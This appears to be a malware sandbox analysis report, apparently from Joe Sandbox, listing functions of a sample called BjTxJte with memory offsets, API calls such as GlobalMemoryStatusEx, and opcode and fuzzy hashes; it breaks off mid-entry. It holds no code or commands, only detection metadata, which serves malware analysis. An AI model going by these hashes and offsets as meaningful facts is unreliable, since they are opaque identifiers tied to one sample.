                                                                                      • API String ID: 1890195054-0
                                                                                      • Opcode ID: 6c7889c6e6e5451dae5266ce457cee2df173f90c9dc7287711bef130c8b98875
                                                                                      • Instruction ID: 178365d1b0f3941231afff4a476eff7b467917ed4deed6ae8d32c227684dbb9a
                                                                                      • Opcode Fuzzy Hash: 6c7889c6e6e5451dae5266ce457cee2df173f90c9dc7287711bef130c8b98875
                                                                                      • Instruction Fuzzy Hash: A11144B1C00659DFCB10CF9AC5447EEFBF4AB48320F14822AE528B7294D378A940CFA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 012FEFE0 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 1822 12fefe0-12ff054 GlobalMemoryStatusEx 1824 12ff05d-12ff085 1822->1824 1825 12ff056-12ff05c 1822->1825 1825->1824
                                                                                      APIs
                                                                                      • GlobalMemoryStatusEx.KERNELBASE ref: 012FF047
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4122198845.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_12f0000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID: GlobalMemoryStatus
                                                                                      • String ID:
                                                                                      • API String ID: 1890195054-0
                                                                                      • Opcode ID: 97af1c444296d636a992967243274b59a0f987678593fffe29f9761d564eb155
                                                                                      • Instruction ID: 9890cdefcd1208f9540b98b2a6d7884de358eed60e8851e1308a20ab54961e0a
                                                                                      • Opcode Fuzzy Hash: 97af1c444296d636a992967243274b59a0f987678593fffe29f9761d564eb155
                                                                                      • Instruction Fuzzy Hash: C411F3B2C006599BCB10DF9AC544BDEFBF4AF48324F14816AD918A7254D378A944CFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0682DAE5 Relevance: 1.4, Strings: 1, Instructions: 125COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: PH^q
                                                                                      • API String ID: 0-2549759414
                                                                                      • Opcode ID: ef849ba0a9eaa9c4abd58bb0f68a8d45683dff6b336a44802347117dc58bf66c
                                                                                      • Instruction ID: e702c96e8ddfd48c914bd9f886aac46b053775addeb2f10c6ff65ca1df010036
                                                                                      • Opcode Fuzzy Hash: ef849ba0a9eaa9c4abd58bb0f68a8d45683dff6b336a44802347117dc58bf66c
                                                                                      • Instruction Fuzzy Hash: AF418D30E1031A9FDB65DFA4C4546AEBFB2AF85300F108529E515EB384DB75E986CB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 068221CF Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: PH^q
                                                                                      • API String ID: 0-2549759414
                                                                                      • Opcode ID: 59d972ea54a4de741307834faf743053a596f3120908c9136698c4e353516552
                                                                                      • Instruction ID: dab5b1b73473478cfd4a63f24501ef57f0f6d76847a137c5a1ef69e3b4461cec
                                                                                      • Opcode Fuzzy Hash: 59d972ea54a4de741307834faf743053a596f3120908c9136698c4e353516552
                                                                                      • Instruction Fuzzy Hash: 9D31EF30B102128FDB59AB74D46466EBBA2FF89300F204579D406DB394DF36DD86C7A1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 068221D8 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: PH^q
                                                                                      • API String ID: 0-2549759414
                                                                                      • Opcode ID: bc79525f1a0fccb8decdd3d0184d776b418522d99dffcf4a159a020f81481984
                                                                                      • Instruction ID: b775bcefca08f1d8e58092c951dcda4b791c8d1d378aef37339ca6f19ef13b25
                                                                                      • Opcode Fuzzy Hash: bc79525f1a0fccb8decdd3d0184d776b418522d99dffcf4a159a020f81481984
                                                                                      • Instruction Fuzzy Hash: CB31EF30B102168FCB59AB74D46466EBAE2BB89300F208539D406DB398DE36DD86C7A1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 068282D7 Relevance: 1.3, Strings: 1, Instructions: 31COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q
                                                                                      • API String ID: 0-388095546
                                                                                      • Opcode ID: b2f6edcc9ec4e1e7ac38f1be88ecb889fc3acb8d626d7e62860392c5370994c9
                                                                                      • Instruction ID: 36e8ea9ea07622469eef337c34c23d475879f9c83e71f243f4e3b99a675445a5
                                                                                      • Opcode Fuzzy Hash: b2f6edcc9ec4e1e7ac38f1be88ecb889fc3acb8d626d7e62860392c5370994c9
                                                                                      • Instruction Fuzzy Hash: 03F082B6E0423ADFDF649E50E8496BC77B4FF00714F194466C904D7254D33099CACB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06824A71 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: \Ocq
                                                                                      • API String ID: 0-2995510325
                                                                                      • Opcode ID: 8ef7ff78ff7671a153643c305042b27f778121cfeacd7c1626f9c3c8303382f9
                                                                                      • Instruction ID: 5a930be97671bfb6ab053be288a00a6929efe272e06da63184e136d25de49279
                                                                                      • Opcode Fuzzy Hash: 8ef7ff78ff7671a153643c305042b27f778121cfeacd7c1626f9c3c8303382f9
                                                                                      • Instruction Fuzzy Hash: 1FF0FE30A1022ADFDB14DF94E8597AEBBB2FF88704F204129E403E7294CB741C45CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06826208 Relevance: .2, Instructions: 229COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f75747de2ca243a2ba6bb78db27db3cc37d1d31c49db1abd3b8ce477c8f63031
                                                                                      • Instruction ID: 75e68c7dc36455e5a3d063b72b4c882a1e9db27b4ceb2c2e553dc85851bc0749
                                                                                      • Opcode Fuzzy Hash: f75747de2ca243a2ba6bb78db27db3cc37d1d31c49db1abd3b8ce477c8f63031
                                                                                      • Instruction Fuzzy Hash: 0B61C0B1F000224FCF549A79C88466FAAD7EFC8624B15443AD90EDB364EE65DD4287D2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 068242BB Relevance: .2, Instructions: 227COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f70ed55669041507c931bcdf31ff0c3d1a5b53846a2ec637ccd75aea8d4d7c49
                                                                                      • Instruction ID: a89775108e0165fb7be2268fdcb52a90343c049ada25e2ecf8323dc04c0a6812
                                                                                      • Opcode Fuzzy Hash: f70ed55669041507c931bcdf31ff0c3d1a5b53846a2ec637ccd75aea8d4d7c49
                                                                                      • Instruction Fuzzy Hash: 45816F30B0021A9FDF54DFA9D55466EB7F6AF89304F108529D50ADB394EB30EC828BA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 068245D8 Relevance: .2, Instructions: 219COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d2b0eec861a71144c47a1d2916e7ff13433caf6d583718ccc87db6cfe45764fa
                                                                                      • Instruction ID: 8c4d2a8664ec6600bbfab33eda9bf6960a01865cf97ab5a4524c98f301434090
                                                                                      • Opcode Fuzzy Hash: d2b0eec861a71144c47a1d2916e7ff13433caf6d583718ccc87db6cfe45764fa
                                                                                      • Instruction Fuzzy Hash: AA912C30E1021A8FDF60DF68C890B9DB7B1FF89314F208699D549EB255EB70A985CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 068245F0 Relevance: .2, Instructions: 210COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e1b3b89b4a5b5454a7013160b0d63b76cb0ad962b54b591217beec12d1eb4c9a
                                                                                      • Instruction ID: 45ddcfb7b63a5b8965e0eca77403c12df6b05c98864c22bf842b898ea616a915
                                                                                      • Opcode Fuzzy Hash: e1b3b89b4a5b5454a7013160b0d63b76cb0ad962b54b591217beec12d1eb4c9a
                                                                                      • Instruction Fuzzy Hash: A0913D30E1021A8BDF60DF68C880B9DB7B1FF89314F208599D549EB355EB70A985CF91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0682EF40 Relevance: .2, Instructions: 206COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d874ffe2f3092ae0459bb56f0d48f2d0996a1c8b9a219d2c2f9d31063ab17d5a
                                                                                      • Instruction ID: 889a654711a692db1d2a9c252603ff10031d43dd7de186aa0ca8c24f17688484
                                                                                      • Opcode Fuzzy Hash: d874ffe2f3092ae0459bb56f0d48f2d0996a1c8b9a219d2c2f9d31063ab17d5a
                                                                                      • Instruction Fuzzy Hash: B1715E71A0021A8FDB55DFA8D980AAEFBF6FF84300F148569D105EB359DB30E886CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0682EF50 Relevance: .2, Instructions: 201COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 47f287a21917ad4d0a644c92e94fd32d07b4186eddb8f4461b0d9ac3ff6ed717
                                                                                      • Instruction ID: 955bbd94ef0e4a765542dee7bf10ca85b1cbbc3455b4213c4c260d061bd4ecf4
                                                                                      • Opcode Fuzzy Hash: 47f287a21917ad4d0a644c92e94fd32d07b4186eddb8f4461b0d9ac3ff6ed717
                                                                                      • Instruction Fuzzy Hash: 07712B71A0021A9FDB55DFA9D980AAEFBF6FF84300F148429D115EB359DB30E886CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0682FCA9 Relevance: .2, Instructions: 179COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3b60d4ff3aef05deb29d2bc284ca8a454fb983fe37970f3fc7a3da3843ed9624
                                                                                      • Instruction ID: 22f833b8f4c0ed59b334450c957297ecb8e3e1f262492b07f928d3b6a73b77ed
                                                                                      • Opcode Fuzzy Hash: 3b60d4ff3aef05deb29d2bc284ca8a454fb983fe37970f3fc7a3da3843ed9624
                                                                                      • Instruction Fuzzy Hash: 39511375E40126CFCF64ABB8E4446ADB7B2FB84315F20887AE306DB251CB349985CB80
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0682FA58 Relevance: .2, Instructions: 173COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f547aa10248468a59716b73f27b3c01bcda450f3c44f5d3919938242ed66a07a
                                                                                      • Instruction ID: 658dcb9dfff665015a29ba37005433360500fd790d88e6ad9df8637d82650bab
                                                                                      • Opcode Fuzzy Hash: f547aa10248468a59716b73f27b3c01bcda450f3c44f5d3919938242ed66a07a
                                                                                      • Instruction Fuzzy Hash: C551D870B602259FEF645A78D96477F266AD789710F20442AE70BE7398CA39CC85C392
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0682FA68 Relevance: .2, Instructions: 163COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cb45367e67596cba7047fca23621085d0a7216a66e2f2f5b186ccd4294564490
                                                                                      • Instruction ID: 7de13fcfc8b946908068cfaf75892a367e0b394f8f4a47e13d7879b082f00a08
                                                                                      • Opcode Fuzzy Hash: cb45367e67596cba7047fca23621085d0a7216a66e2f2f5b186ccd4294564490
                                                                                      • Instruction Fuzzy Hash: E451C970B602259FEF645B6CD96473F266ED789710F10482AE70BE73D8CA39DC858392
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06825433 Relevance: .1, Instructions: 131COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 32edd3f2b0e44952eec5f100c03131eb85f380b8ede3cfd5c65bcf146d3f5f14
                                                                                      • Instruction ID: 4f825acdd4dcd6b31bd2a251bcd421bec4ffc4651fe6f5134e1e0bc50e5e7761
                                                                                      • Opcode Fuzzy Hash: 32edd3f2b0e44952eec5f100c03131eb85f380b8ede3cfd5c65bcf146d3f5f14
                                                                                      • Instruction Fuzzy Hash: 67417F71E4061A8FCF70CFA9C980AAFFBB2FB44310F10492AD256D7650D334E9958B92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 068255B0 Relevance: .1, Instructions: 113COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9c29a07f5b312b9bb3665196f845fc24a0e387c4aaf5b8c8111b7cc39d0d3ec4
                                                                                      • Instruction ID: da3ac0b13346b05dbc702eeb85d2e6e8ba195969b5a657c4cf995dac76ad4fae
                                                                                      • Opcode Fuzzy Hash: 9c29a07f5b312b9bb3665196f845fc24a0e387c4aaf5b8c8111b7cc39d0d3ec4
                                                                                      • Instruction Fuzzy Hash: C941C770E401268FDF708F69C5C067EFBB2EB45320F61896AD65AD7281D634E9C1CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06822093 Relevance: .1, Instructions: 91COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 10fb7a25872389893bb36cf9ba015549b0a400e5838c41ad8e44d20f27bd2d22
                                                                                      • Instruction ID: e3d1a4fd546fdd717bfd2c946e9c03fbc08828ffc4f1c4a604b176804fb7c8cc
                                                                                      • Opcode Fuzzy Hash: 10fb7a25872389893bb36cf9ba015549b0a400e5838c41ad8e44d20f27bd2d22
                                                                                      • Instruction Fuzzy Hash: 3D317E30E106169BCF59DFA4D864A9EB7F2FF89300F108529E906EB350DB71A986CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06822098 Relevance: .1, Instructions: 91COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4e0c11359f9540770261f396039bd54edf64a37029635d53afbad714f6061996
                                                                                      • Instruction ID: 8dcfe234520463dc156362deea01368a09c02fe467305b42427535ea33b463a2
                                                                                      • Opcode Fuzzy Hash: 4e0c11359f9540770261f396039bd54edf64a37029635d53afbad714f6061996
                                                                                      • Instruction Fuzzy Hash: 97317030E106169BCB54DF65D854A9EB7F2FF89300F108529E906E7350DB71A986CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06823EC1 Relevance: .1, Instructions: 81COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1a64732e131f03b67262e729e963a71d10269e73b67e15d2739d536fc441b7b8
                                                                                      • Instruction ID: fbee9e1ac33b439d8916cb6ebd63c4efb3d463846efec34052b6a9b0f93ac989
                                                                                      • Opcode Fuzzy Hash: 1a64732e131f03b67262e729e963a71d10269e73b67e15d2739d536fc441b7b8
                                                                                      • Instruction Fuzzy Hash: 1921A375F002169FDB10EF79E850AAEBBF5AB48710F148029E905EB390E734ED418B91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06823ED0 Relevance: .1, Instructions: 78COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5664c48246cc7d2ae76c8505ae9a97d69598c441b28cee3cb0834d2dced5cdbb
                                                                                      • Instruction ID: 1dba868d9fdcefc2373f07f397ce65c1b70e936129ebed0dd8b883e6e35cce1d
                                                                                      • Opcode Fuzzy Hash: 5664c48246cc7d2ae76c8505ae9a97d69598c441b28cee3cb0834d2dced5cdbb
                                                                                      • Instruction Fuzzy Hash: 9D21A175F002169FDB50EF69E850AAEBBF1EB48710F10802AE905EB390E734EC418B90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0114D3BC Relevance: .1, Instructions: 72COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4120375886.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_114d000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d6dd0701a156b65e4ab80b20a5827292c04ba7365e1c4c7d69aaa380ab867e1d
                                                                                      • Instruction ID: 4c9e22be2b7df4080a09386db19cca5e77c0d5b261c135dc31125a9421dd7b83
                                                                                      • Opcode Fuzzy Hash: d6dd0701a156b65e4ab80b20a5827292c04ba7365e1c4c7d69aaa380ab867e1d
                                                                                      • Instruction Fuzzy Hash: 192179B0504200DFCF09DF58E5C0B26BF61FB94714F24C56DD8094B692C336E446CA62
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0114D044 Relevance: .1, Instructions: 72COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4120375886.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_114d000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b54e263085e825c2b26ea0f17eb21346f3999201a0a43c53a0c4823e7cbcd50a
                                                                                      • Instruction ID: d2f44d07b17d6e0a5224897e207206656869b666c5bc7bae2843c44d229a3acb
                                                                                      • Opcode Fuzzy Hash: b54e263085e825c2b26ea0f17eb21346f3999201a0a43c53a0c4823e7cbcd50a
                                                                                      • Instruction Fuzzy Hash: AA217671200204DFCF09CF68E9C4B26BBA1FB98B14F20C5ADE8094B352C73AD447CA62
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0114D20C Relevance: .1, Instructions: 72COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4120375886.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_114d000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4ebfe96e5b45a8460fda58f98edc70887aa4588ba9956e93a1995752b3bbcc39
                                                                                      • Instruction ID: 4c1119807a689c30b8923d034e7d3115820528df3180f0c1874cc96993ec45e1
                                                                                      • Opcode Fuzzy Hash: 4ebfe96e5b45a8460fda58f98edc70887aa4588ba9956e93a1995752b3bbcc39
                                                                                      • Instruction Fuzzy Hash: 36216871504244DFDF09DF98E5C4F2ABBA5FB94B34F20C669E8090B246C376D406CA62
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06824217 Relevance: .1, Instructions: 63COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: eb65aaa8fdbbce7a4217284ae66264c2583db393e3fb61a917fcef695d3f2cfa
                                                                                      • Instruction ID: a1b2d8066d13067cd147f0211d11bb4059f05880c441c1134a00db87da532afe
                                                                                      • Opcode Fuzzy Hash: eb65aaa8fdbbce7a4217284ae66264c2583db393e3fb61a917fcef695d3f2cfa
                                                                                      • Instruction Fuzzy Hash: E201F170B101221FDB6496AEE81176EA7EBCBCE210F10843AE60AC7394DA61DC4383A1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06823470 Relevance: .1, Instructions: 61COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b63ffd2fe55b5859cca21f2bb7f063694c54da018f62a2c9884cfadac29750a1
                                                                                      • Instruction ID: 52e573503eca8832a720003cce1cdd4d3f241737376bb236e149378c56f6a1ac
                                                                                      • Opcode Fuzzy Hash: b63ffd2fe55b5859cca21f2bb7f063694c54da018f62a2c9884cfadac29750a1
                                                                                      • Instruction Fuzzy Hash: 6811C131E0022A5FCB698A7898115EEF7B1AB89304F0045BAD546E7300DA35CA81CBE1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06823FD1 Relevance: .1, Instructions: 59COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cfaa74c73373f63e82d1a1c53d77b0c40dcacb0083749d2afbc4a96c2a103fda
                                                                                      • Instruction ID: ee7074ae2db366f4f4b4260236dccd9d1b00f37f02d61afb75cdee41d20a9499
                                                                                      • Opcode Fuzzy Hash: cfaa74c73373f63e82d1a1c53d77b0c40dcacb0083749d2afbc4a96c2a103fda
                                                                                      • Instruction Fuzzy Hash: 43012632B0402A1FDF95A678EC10AEF77EA9BC9704F04447AD10AD7340EA65984387A1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06823FE0 Relevance: .1, Instructions: 59COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
